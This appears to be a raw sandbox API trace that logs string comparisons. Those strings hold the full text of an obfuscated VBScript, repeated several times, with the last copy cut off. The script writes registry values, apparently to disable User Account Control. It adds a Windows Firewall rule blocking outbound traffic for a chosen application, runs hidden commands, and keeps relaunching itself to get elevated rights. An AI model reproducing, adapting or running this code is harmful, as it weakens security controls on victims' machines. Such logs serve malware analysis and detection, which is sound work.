= TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0222.987] wcsncmp (_String1="im policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.987] wcsncmp (_String1="m policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0222.987] wcsncmp (_String1=" policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.987] wcsncmp (_String1="policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run 